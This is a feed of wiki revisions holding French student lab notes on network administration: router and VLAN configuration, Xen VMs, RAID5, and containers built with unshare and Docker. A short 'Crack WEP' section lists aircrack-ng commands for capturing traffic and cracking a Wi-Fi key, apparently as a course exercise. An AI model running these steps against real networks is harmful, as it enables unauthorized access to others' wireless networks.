      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
===== IPv4 =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
===Sécurisation des données via RAID5===&lt;br /&gt;
====Les partitions====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
====Création du RAID====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
===Sécurisation Wifi par WPA2-EAP===&lt;br /&gt;
&lt;br /&gt;
Suite à une erreur de manipulation le /var est mort&lt;br /&gt;
&lt;br /&gt;
Pour réaliser la suite du TP j'ai recrée une VM Dionysos2, même addresse IP.&lt;br /&gt;
&lt;br /&gt;
Il faut donc éteindre la VM Dionysos pour éviter tout problème&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Crack WEP===&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=48950</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=48950"/>
				<updated>2018-12-17T18:41:20Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
==Séance 1 : 26/11/2018==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Découpage réseau IPV4 routé en deux sous réseaux===&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Découpage du réseau IPV4 non routée en sous réseaux===&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
==Séance 2 : 27/11/2018==&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
===Mise en place du routeur et connexion à celui ci===&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
===Configuration du routeur : Configuration des ports===&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
===Mise en place de la machine virtuelle===&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
  xl create Dionysos.cfg&lt;br /&gt;
  xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
Dans /root/.profile&lt;br /&gt;
  &lt;br /&gt;
  http_proxy=&amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
  https_proxy=&amp;quot;https://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
  xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
==Séance 3 : 10/12/2018==&lt;br /&gt;
&lt;br /&gt;
===Config Routeur 3560===&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
